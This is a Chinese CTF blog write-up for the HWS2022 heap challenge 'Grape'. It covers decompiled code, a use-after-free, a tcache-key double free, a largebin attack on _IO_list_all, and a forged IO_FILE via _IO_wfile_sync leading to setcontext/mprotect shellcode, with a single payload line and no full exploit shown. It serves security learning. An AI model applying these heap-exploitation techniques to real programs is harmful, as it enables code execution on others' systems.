<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="Grape程序分析开了沙箱  菜单堆题  最开始有个初始化函数   这里只需要关注202010这个地址，这个地址存放的是(buf &amp;amp; 0xFFFFFFFFFFFFF000LL) + 80，其实就是用户堆基址(+80是因为tcache) plant函数,提供三个大小类别，确定类别后调用calloc分配chunk(不走tcache)，存放好chunk_addr和size之后读入data，这里用">
<meta property="og:type" content="article">
<meta property="og:title" content="HWS2022 复现WP">
<meta property="og:url" content="http://yoursite.com/2022/02/13/HWS2022/index.html">
<meta property="og:site_name" content="zzrR0">
<meta property="og:description" content="Grape程序分析开了沙箱  菜单堆题  最开始有个初始化函数   这里只需要关注202010这个地址，这个地址存放的是(buf &amp;amp; 0xFFFFFFFFFFFFF000LL) + 80，其实就是用户堆基址(+80是因为tcache) plant函数,提供三个大小类别，确定类别后调用calloc分配chunk(不走tcache)，存放好chunk_addr和size之后读入data，这里用">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212151929256.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207154409552.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207155800844.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207155816499.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207160620900.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212151950805.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207161008704.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207161132687.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207154431334.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220207155521263.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213121053526.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213121115654.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122024731.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122032295.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122057599.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122112697.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122500022.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122942216.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122631726.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213122840263.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213123202667.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213123214934.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220213123223559.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212160643571.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212161515691.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212161758290.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212160741394.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212184057301.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212184216394.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212194417584.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212185538528.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212185456433.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212194459079.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212194531214.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212194554999.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212194603198.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212194821519.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212153527020.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212153545347.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212155259739.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212155341654.png">
<meta property="og:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212155414061.png">
<meta property="og:updated_time" content="2022-02-13T13:48:55.226Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HWS2022 复现WP">
<meta name="twitter:description" content="Grape程序分析开了沙箱  菜单堆题  最开始有个初始化函数   这里只需要关注202010这个地址，这个地址存放的是(buf &amp;amp; 0xFFFFFFFFFFFFF000LL) + 80，其实就是用户堆基址(+80是因为tcache) plant函数,提供三个大小类别，确定类别后调用calloc分配chunk(不走tcache)，存放好chunk_addr和size之后读入data，这里用">
<meta name="twitter:image" content="http://yoursite.com/2022/02/13/HWS2022/image-20220212151929256.png">






  <link rel="canonical" href="http://yoursite.com/2022/02/13/HWS2022/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>HWS2022 复现WP | zzrR0</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zzrR0</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2022/02/13/HWS2022/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zzrR0">
      <meta itemprop="description" content="Why am i so cai.">
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zzrR0">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">HWS2022 复现WP
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2022-02-13 21:47:01 / 修改时间：21:48:55" itemprop="dateCreated datePublished" datetime="2022-02-13T21:47:01+08:00">2022-02-13</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2022/02/13/HWS2022/#comments" itemprop="discussionUrl">
                
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2022/02/13/HWS2022/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2022/02/13/HWS2022/" class="leancloud_visitors" data-flag-title="HWS2022 复现WP">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数：</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Grape"><a href="#Grape" class="headerlink" title="Grape"></a>Grape</h2><h3 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h3><p>开了沙箱</p>
<p><img src="/2022/02/13/HWS2022/image-20220212151929256.png" alt="image-20220212151929256"></p>
<p>菜单堆题</p>
<p><img src="/2022/02/13/HWS2022/image-20220207154409552.png" alt="image-20220207154409552"></p>
<p>最开始有个初始化函数</p>
<p><img src="/2022/02/13/HWS2022/image-20220207155800844.png" alt="image-20220207155800844"></p>
<p><img src="/2022/02/13/HWS2022/image-20220207155816499.png" alt="image-20220207155816499"></p>
<p>这里只需要关注202010这个地址，这个地址存放的是(buf &amp; 0xFFFFFFFFFFFFF000LL) + 80，其实就是用户堆基址(+80是因为tcache)</p>
<p>plant函数,提供三个大小类别，确定类别后调用calloc分配chunk(不走tcache)，存放好chunk_addr和size之后读入data，这里用的size-1，所以没有offbyone</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">plant</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+8h] [rbp-28h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v2; <span class="comment">// [rsp+Ch] [rbp-24h]</span></span><br><span class="line">  __int64 buf[<span class="number">3</span>]; <span class="comment">// [rsp+10h] [rbp-20h] BYREF</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">if</span> ( dword_20201C &lt;= <span class="number">0</span> || dword_20201C &gt; <span class="number">16</span> )</span><br><span class="line">    exit_();</span><br><span class="line">  --dword_20201C;</span><br><span class="line">  buf[<span class="number">0</span>] = <span class="number">0L</span>L;</span><br><span class="line">  buf[<span class="number">1</span>] = <span class="number">0L</span>L;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Let's plant a grape tree!"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Input the idx of the grape tree you wanner plant:"</span>);</span><br><span class="line">  v2 = rc();</span><br><span class="line">  <span class="keyword">if</span> ( v2 &gt; <span class="number">0xF</span> )</span><br><span class="line">    exit_();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You want a small one / medium one / big one?"</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">8u</span>LL);</span><br><span class="line">  <span class="keyword">if</span> ( !<span class="built_in">strncmp</span>((<span class="keyword">const</span> <span class="keyword">char</span> *)buf, <span class="string">"small"</span>, <span class="number">5u</span>LL) )</span><br><span class="line">  &#123;</span><br><span class="line">    v1 = <span class="number">0x18</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strncmp</span>((<span class="keyword">const</span> <span class="keyword">char</span> *)buf, <span class="string">"medium"</span>, <span class="number">6u</span>LL) )</span><br><span class="line">  &#123;</span><br><span class="line">    v1 = <span class="number">0x108</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( <span class="built_in">strncmp</span>((<span class="keyword">const</span> <span class="keyword">char</span> *)buf, <span class="string">"big"</span>, <span class="number">3u</span>LL) )</span><br><span class="line">      exit_();</span><br><span class="line">    v1 = <span class="number">0x408</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  *((_QWORD *)&amp;unk_202060 + <span class="number">2</span> * v2) = sub_FD1(v1);<span class="comment">// chunk_addr</span></span><br><span class="line">                                                <span class="comment">// </span></span><br><span class="line">  *((_QWORD *)&amp;unk_202060 + <span class="number">2</span> * v2 + <span class="number">1</span>) = v1;   <span class="comment">// size</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Leave a message to your grape tree:"</span>);</span><br><span class="line">  read(<span class="number">0</span>, *((<span class="keyword">void</span> **)&amp;unk_202060 + <span class="number">2</span> * v2), v1 - <span class="number">1</span>);<span class="comment">// no off-by-one</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Well, you build a grape tree successfully!"</span>);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>remove函数，只free了chunk，但是并没有把chunk_addr清空，导致存在一个UAF</p>
<p><img src="/2022/02/13/HWS2022/image-20220207160620900.png" alt="image-20220207160620900"></p>
<p>watch函数，也是印证了UAF，这里不像peachw那题存在负数索引，因为比较用的jbe是比较的无符号数</p>
<p><img src="/2022/02/13/HWS2022/image-20220212151950805.png" alt="image-20220212151950805"></p>
<p><img src="/2022/02/13/HWS2022/image-20220207161008704.png" alt="image-20220207161008704"></p>
<p>edit函数可以当成空函数，没有实际作用</p>
<p><img src="/2022/02/13/HWS2022/image-20220207161132687.png" alt="image-20220207161132687"></p>
<p>另外给了一个后门函数</p>
<p><img src="/2022/02/13/HWS2022/image-20220207154431334.png" alt="image-20220207154431334"></p>
<p><img src="/2022/02/13/HWS2022/image-20220207155521263.png" alt="image-20220207155521263"></p>
<p>后门函数修改离202010偏移0xA000以内地址的值</p>
<p>思路是largebinattack，攻击_IO_list_all伪造一个__IO_FILE结构体，通过IO_FILE的虚表实现orw</p>
<p>现在比较难的问题就是题目只提供了三个大小类型的chunk，最大是0x408，是不到largebin的，所以我们要通过free两个相邻的0x408chunk来合并出一个largechunk(这里根据网上wp所说，如果直接先填满tcache之后再正常合并的话，会超次数)，所以需要用一个不正常的技巧，即修改tcache chunk的key，来重用tcachechunk，这样能节省次数</p>
<p><a href="https://zhuanlan.zhihu.com/p/136983333" target="_blank" rel="noopener">Heap Exploit v2.31 | 最新堆利用技巧，速速查收 - 知乎 (zhihu.com)</a></p>
<p>2.29版本以后，tcachechunk多加了个key字段 再tache_put里有 e-&gt;key=tcache，并且每次put的时候通过key来检查是否发生了double free，所以我们可以利用后门函数来修改已经进入tcache的chunk的key字段，然后再次free这个chunk，就达到了double free的目的 </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">tcache_entry</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">tcache_entry</span> *<span class="title">next</span>;</span></span><br><span class="line"><span class="comment">/* This field exists to detect double frees.  */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">tcache_perthread_struct</span> *<span class="title">key</span>;</span></span><br><span class="line">&#125; tcache_entry;</span><br></pre></td></tr></table></figure>
<p>再次double free时，由于会判定tcache已经满了，所以虽然仍然还是原来tcache chunk，但是会被重新free到unsortedbin chunk里</p>
<p>这样两个chunk合并在一起就能创造一个large chunk</p>
<h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>直接用pwndocker，设置为题目给的libc，会无法使用高级命令，比如快速查看堆的命令，因为题目给的libc不是debug版本，而我们有没下载相关符号</p>
<p><img src="/2022/02/13/HWS2022/image-20220213121053526.png" alt="image-20220213121053526"></p>
<p>后来找到这个工具</p>
<p><a href="https://github.com/io12/pwninit" target="_blank" rel="noopener">io12/pwninit: pwninit - automate starting binary exploit challenges (github.com)</a></p>
<p><img src="/2022/02/13/HWS2022/image-20220213121115654.png" alt="image-20220213121115654"></p>
<p>这个程序会自动创建搭建特定libc的脚本，但是我们用不到脚本，我们主要用他下载到的debug版本的libc，指定成debug版本的libc就能用高级命令了</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>这里有个largebin的小细节，以前没注意到</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122024731.png" alt="image-20220213122024731"></p>
<p><img src="/2022/02/13/HWS2022/image-20220213122032295.png" alt="image-20220213122032295"></p>
<p>exp里是通过delete7 然后再delete8形成一个新的large chunk’0x820插入到largebin里，</p>
<p>我们从上图可以看到按size大小，fd_nextsize的方向上，size是逐渐变小的，因此libc里面查找合适的插入位置，是这样遍历这去找的</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122057599.png" alt="image-20220213122057599"></p>
<p>但是当插入到相同大小的竖向的链表上时，正如这里说的，永远插入的是竖向列表的第二个位置</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122112697.png" alt="image-20220213122112697"></p>
<p>而不是单纯意义上的FIFO，(大体上是这样)，因为第一个插入的chunk1要占据链表头的位置，如果是完全FIFO的话，当插入chunk2的时候，应该是chunk2-&gt; chunk1，但是这里的算法结果是chunk1-&gt;chunk2，在这个局部并不是FIFO，但是两个以上的块之后都是FIFO了</p>
<p>这题先用largebin attack向io_list_all中打入victim chunk的地址，也就是unsorted bin里面被重排的地址</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122500022.png" alt="image-20220213122500022"></p>
<p>然后伪造一个IO_FILE,利用refs里的2.29打法，使用_IO_wfile_sync，wfile_sync</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122942216.png" alt="image-20220213122942216"></p>
<p>在满足条件的情况下，会调用do_encoding的函数指针，我们只要在这个指针填上orw就行</p>
<p>相关结构体</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">Wide_data</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Extra data for wide character streams.  */</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_wide_data</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_read_ptr;  <span class="comment">/* Current read pointer */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_read_end;  <span class="comment">/* End of get area. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_read_base; <span class="comment">/* Start of putback+get area. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_write_base;  <span class="comment">/* Start of put area. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_write_ptr; <span class="comment">/* Current put pointer. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_write_end; <span class="comment">/* End of put area. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_buf_base;  <span class="comment">/* Start of reserve area. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_buf_end;   <span class="comment">/* End of reserve area. */</span></span><br><span class="line">  <span class="comment">/* The following fields are used to support backing up and undo. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_save_base; <span class="comment">/* Pointer to start of non-current get area. */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_backup_base; <span class="comment">/* Pointer to first valid character of</span></span><br><span class="line"><span class="comment">           backup area */</span></span><br><span class="line">  <span class="keyword">wchar_t</span> *_IO_save_end;  <span class="comment">/* Pointer to end of non-current get area. */</span></span><br><span class="line">  <span class="keyword">__mbstate_t</span> _IO_state;</span><br><span class="line">  <span class="keyword">__mbstate_t</span> _IO_last_state;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_codecvt</span> _<span class="title">codecvt</span>;</span></span><br><span class="line">  <span class="keyword">wchar_t</span> _shortbuf[<span class="number">1</span>];</span><br><span class="line">  <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IO_jump_t</span> *_<span class="title">wide_vtable</span>;</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">IO_codecvt</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_codecvt</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">void</span> (*__codecvt_destr) (struct _IO_codecvt *);</span><br><span class="line">  <span class="keyword">enum</span> __codecvt_result (*__codecvt_do_out) (struct _IO_codecvt *,</span><br><span class="line">               <span class="keyword">__mbstate_t</span> *,</span><br><span class="line">               <span class="keyword">const</span> <span class="keyword">wchar_t</span> *,</span><br><span class="line">               <span class="keyword">const</span> <span class="keyword">wchar_t</span> *,</span><br><span class="line">               <span class="keyword">const</span> <span class="keyword">wchar_t</span> **, <span class="keyword">char</span> *,</span><br><span class="line">               <span class="keyword">char</span> *, <span class="keyword">char</span> **);</span><br><span class="line">  <span class="keyword">enum</span> __codecvt_result (*__codecvt_do_unshift) (struct _IO_codecvt *,</span><br><span class="line">             <span class="keyword">__mbstate_t</span> *, <span class="keyword">char</span> *,</span><br><span class="line">             <span class="keyword">char</span> *, <span class="keyword">char</span> **);</span><br><span class="line">  <span class="keyword">enum</span> __codecvt_result (*__codecvt_do_in) (struct _IO_codecvt *,</span><br><span class="line">              <span class="keyword">__mbstate_t</span> *,</span><br><span class="line">              <span class="keyword">const</span> <span class="keyword">char</span> *, <span class="keyword">const</span> <span class="keyword">char</span> *,</span><br><span class="line">              <span class="keyword">const</span> <span class="keyword">char</span> **, <span class="keyword">wchar_t</span> *,</span><br><span class="line">              <span class="keyword">wchar_t</span> *, <span class="keyword">wchar_t</span> **);</span><br><span class="line">  <span class="keyword">int</span> (*__codecvt_do_encoding) (struct _IO_codecvt *);</span><br><span class="line">  <span class="keyword">int</span> (*__codecvt_do_always_noconv) (struct _IO_codecvt *);</span><br><span class="line">  <span class="keyword">int</span> (*__codecvt_do_length) (struct _IO_codecvt *, <span class="keyword">__mbstate_t</span> *,</span><br><span class="line">            <span class="keyword">const</span> <span class="keyword">char</span> *, <span class="keyword">const</span> <span class="keyword">char</span> *, <span class="keyword">size_t</span>);</span><br><span class="line">  <span class="keyword">int</span> (*__codecvt_do_max_length) (struct _IO_codecvt *);</span><br><span class="line">  _IO_iconv_t __cd_in;</span><br><span class="line">  _IO_iconv_t __cd_out;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>整个jumps如下</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122631726.png" alt="image-20220213122631726"></p>
<p>正常的exit路径是调用到overflow，因此exp里使用的是+0x48，使得wfile_sync出现在overflow的位置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload += p64(wfile_vtable+0x48) #vtable</span><br></pre></td></tr></table></figure>
<p>直接搜是能够搜IO_wfile_sync的函数 到这个wfile的</p>
<p><img src="/2022/02/13/HWS2022/image-20220213122840263.png" alt="image-20220213122840263"></p>
<p>orw部分就是老生常谈了</p>
<p>mprotect是修改一块内存区域的保护属性</p>
<p><img src="/2022/02/13/HWS2022/image-20220213123202667.png" alt="image-20220213123202667"></p>
<p>rsp下面借助setcontext实现控制流到read执行shellcode</p>
<p><img src="/2022/02/13/HWS2022/image-20220213123214934.png" alt="image-20220213123214934"></p>
<p><img src="/2022/02/13/HWS2022/image-20220213123223559.png" alt="image-20220213123223559"></p>
<p>由于chunk块比较大，所有的payload都可以放在一起，这里面因为沙箱没有禁用架构，因此可以切换到32位模式使用32位的调用号，也算是典型技巧</p>
<p>exp如下</p>
